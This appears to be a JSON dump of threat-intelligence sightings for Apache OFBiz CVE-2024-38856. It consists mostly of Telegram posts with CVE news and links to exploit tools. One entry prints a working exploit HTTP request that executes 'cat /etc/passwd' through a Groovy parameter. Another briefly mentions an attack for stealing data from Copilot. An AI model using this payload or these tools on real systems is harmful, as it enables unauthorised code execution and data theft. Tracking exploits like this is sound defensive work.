harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner &amp; Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. 
It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:57:55.000000Z"}, {"uuid": "8edcd0d2-ff8d-48d3-8889-e05fe6c3bccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/686", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner &amp; Exploit 
(CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is dicussed in more detail during the Relay Your Heart Away: An OPSEC Concious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:24.000000Z"}, {"uuid": "e2b4374c-8df4-48b3-a29a-718f1aa21116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/YourAnonTl3x/981", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-01T10:57:46.000000Z"}, {"uuid": "64cc179e-bf05-42c4-a3ef-f64682d8aad4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/anonymous_secures/2796", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. 
The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-09T16:20:36.000000Z"}, {"uuid": "da73a949-9647-448b-84d7-8056a0e55dae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/KomunitiSiber/2475", "content": "CISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports\nhttps://thehackernews.com/2024/08/cisa-flags-critical-apache-ofbiz-flaw.html\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.\nThe vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.", "creation_timestamp": "2024-08-28T12:39:46.000000Z"}, {"uuid": "0ff588cf-7c19-4665-909e-e8f70133fa47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8613", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka 
UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is discussed in more detail during the Relay Your Heart Away: An OPSEC Conscious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:29.000000Z"}, {"uuid": "0ce09e11-eb94-4b81-8ed9-42bd61d15ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3680", "content": "Tools\u00a0 - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. 
Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:58:01.000000Z"}, {"uuid": "aad4c7f0-585c-469f-950e-b568c7faac33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/23482", "content": "Tools  - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. 
If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-22T12:10:27.000000Z"}, {"uuid": "131f48a3-0750-4e6a-b660-6174ded6d45c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3674", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code 
Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. 
Technical analysis of the technique is discussed in more detail during the Relay Your Heart Away: An OPSEC Conscious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:37.000000Z"}, {"uuid": "1190f1a7-7ad8-4cca-99fb-3684928a1b63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2213", "content": "Apache OfBiz vulns \n*\nFull set: PoCs, RCEs, cURLs, Burp Suites\n(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)\n*\n// lInK*/\n\n#apache", "creation_timestamp": "2024-08-06T16:34:23.000000Z"}, {"uuid": "a27cec0d-6725-47af-8aa4-a4dfb81c4e15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7313", "content": "Tools\u00a0 - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. 
And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:58:22.000000Z"}, {"uuid": "a72974e2-a0ae-407a-bab2-13c06bfa2ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "Telegram/l-KCz0w-5IlM_1KOHtVfcugsSu_9n3luhILR9TkCXHwydzY", "content": "", "creation_timestamp": "2024-08-29T08:36:57.000000Z"}, {"uuid": "705427b1-8deb-4e90-b508-db933a4ed168", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7291", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan 
for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is discussed in more detail during the Relay Your Heart Away: An OPSEC Conscious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:29.000000Z"},
{"uuid": "e39e5d85-0a58-4955-b34f-eb87de9ea564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/true_secator/6065", "content": "A new 0-day has been discovered in the open-source ERP system Apache OFBiz that allows pre-authentication remote code execution on vulnerable instances.\n\nIt is tracked as CVE-2024-38856 and has a CVSS score of 9.8 out of a maximum of 10.0, affecting all versions of Apache OFBiz prior to 18.12.15.\n\nAccording to SonicWall, which discovered the issue, the root cause of the vulnerability lies in a flaw in the authentication mechanism.\n\nIt allows an unauthorized user to access functionality that normally requires the user to be logged in, which opens the way to RCE.\n\nAs the researchers explain, CVE-2024-38856 is a bypass of the fix for another flaw, CVE-2024-36104, a path traversal vulnerability that was addressed in early June with the release of 18.12.14.\n\nThe core problem is related to the override view functionality, which exposes critical endpoints to unauthenticated attackers, who can exploit it with specially crafted requests.\n\nUsers are strongly advised to update their instances to version 18.12.15 or later, since OFBiz is already in hackers' sights, including operators of the Mirai botnet, who are actively exploiting the patched CVE-2024-32113.", "creation_timestamp": "2024-08-07T11:58:50.000000Z"},
{"uuid": "8d6c92bc-e6b0-49ef-869e-47a9bb92438a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/rebooornsTacyyyy/76848", "content": "https://github.com/ThatNotEasy/CVE-2024-38856", "creation_timestamp": "2024-08-10T15:59:03.000000Z"},
{"uuid": "2fa907f5-262d-4a46-8ea7-72a2d958e00f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3027", "content": "https://github.com/securelayer7/CVE-2024-38856_Scanner\n\nApache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n#github", "creation_timestamp": "2024-08-19T14:57:28.000000Z"},
{"uuid": "6e10ec52-b2a8-429c-8692-c4bc3fe3cf97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/6146", "content": "In brief, the picture for other vulnerabilities is as follows.\n\nThe critical vulnerability CVE-2024-6386 (CVSS: 9.9) in the WPML plugin leaves WordPress sites vulnerable, affecting all versions of the plugin prior to 4.6.13, released on August 20, 2024.\n\nWPML is a popular plugin used to build multilingual WordPress sites, with a million active installations.\n\nThe researcher who discovered the vulnerability, Stealthcopter, notes that the problem lies in the plugin's handling of shortcodes, which are used to insert post content: audio, images and video.\n\nThe issue, which stems from missing input validation and sanitization, allows authenticated attackers with Contributor-level access or higher to execute code on the server.\n\nResearchers have found a way to dump the root provisioning key (or Fuse Key0) for Intel SGX.\n\nThe method works only on certain processor series for which support has already ended. \n\nThis key can now be used to extract and decrypt data from the SGX protected mode using Intel's own keys, or to place data inside it.\n\nThe issue is caused by a bug in Intel microcode. Specifically, it involves the inability to clear the internal buffer that holds all fuse values, including FK0.\n\nResearcher Marcus Hutchins published an article on CVE-2024-38063 (CVSS 9.8), in which he concluded that there are no reliable PoCs (at the moment), apart from this one, which causes a DoS.\n\nMobile Security Framework (MobSF) has fixed a vulnerability in its mobile pentesting product that can be exploited via ZIP Slip attacks for remote code execution on the MobSF server.\n\nThe bug received a CVSS score of 9.8 and is easy to exploit.\n\nRedTeam Pentesting has published a report on CVE-2024-43425, a remote code execution vulnerability that was fixed in the Moodle access management system.\n\nA PoC has become available for CVE-2024-38856, a pre-authentication RCE in Apache OFBiz, fixed earlier this month.\n\nThe bug has been added to CISA's KEV catalog of actively exploited bugs.\n\nMicrosoft has fixed an attack vector that used ASCII characters to steal customer data from Copilot AI.\n\nThe Trend Micro research team discloses details of CVE-2024-37079 in VMware vCenter Server, describing the root cause of the bug and showing how it can be used for RCE.\n\nSo far no attacks have been detected in the wild, and exploitation is not trivial.", "creation_timestamp": "2024-08-29T14:20:05.000000Z"},
{"uuid": "0e8da284-3fb7-4874-934d-a142eebc7402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", 
"type": "published-proof-of-concept", "source": "https://t.me/DailyToolz/1212", "content": "https://github.com/ThatNotEasy/CVE-2024-38856", "creation_timestamp": "2024-08-10T05:15:00.000000Z"}, {"uuid": "4af0ad76-afd1-4c55-bfaf-65473daeafac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/thehackernews/5366", "content": "A zero-day vulnerability in Apache OFBiz ERP system has been disclosed, allowing remote code execution. \n \nThis vulnerability, CVE-2024-38856, has a critical CVSS score of 9.8, making it extremely dangerous for businesses using this software. \n \nRead: https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html \n \nShare this to raise awareness!", "creation_timestamp": "2024-08-06T06:18:37.000000Z"}, {"uuid": "c339abdb-0b85-4ac9-9e8c-5a861ba59dca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/5486", "content": "CISA has added a critical Apache OFBiz flaw, CVE-2024-38856, to its Known Exploited Vulnerabilities list. It allows RCE attacks, putting countless businesses at serious risk. 
\n \nhttps://thehackernews.com/2024/08/cisa-flags-critical-apache-ofbiz-flaw.html \n \nPoC exploits are already public, so update your systems immediately.", "creation_timestamp": "2024-08-28T07:44:22.000000Z"}, {"uuid": "028a994c-1a12-4814-b75d-24699d092acd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9015", "content": "GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-10T09:29:50.000000Z"}, {"uuid": "d5afae69-b8cb-48e9-9c9f-e43469016ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2953", "content": "Apache OFBiz CVE-2024-38856\n\nPOST /webtools/control/main/ProgramExport HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 68\n\ngroovyProgram=throw new Exception('cat /etc/passwd'.execute().text);\n\n#exploit #poc", "creation_timestamp": "2024-08-06T09:58:15.000000Z"}, {"uuid": "8d2f3bfa-2030-43da-be15-2590cf407f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11004", "content": "#exploit\n1. CVE-2024-7646:\nIngress-NGINX Annotation Validation Bypass\nhttps://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass\n\n2. 
CVE-2024-38856:\nApache OFBiz Pre-Authentication RCE (Scanner + Exploit)\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-19T21:16:17.000000Z"}, {"uuid": "fdf54fb0-67c3-4361-bb6f-8a809f923def", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/18", "content": "Tools  - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. 
It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-22T12:10:29.000000Z"}, {"uuid": "271d39ab-e250-4f85-8ba1-25f558d59794", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/4060", "content": "#exploit\n1. CVE-2024-7646:\nIngress-NGINX Annotation Validation Bypass\nhttps://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass\n\n2. CVE-2024-38856:\nApache OFBiz Pre-Authentication RCE (Scanner + Exploit)\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-19T09:17:15.000000Z"}, {"uuid": "bcf1af9e-591e-4a53-9a72-2ee3789f97ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/507", "content": "GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2025-10-07T03:56:44.000000Z"}]}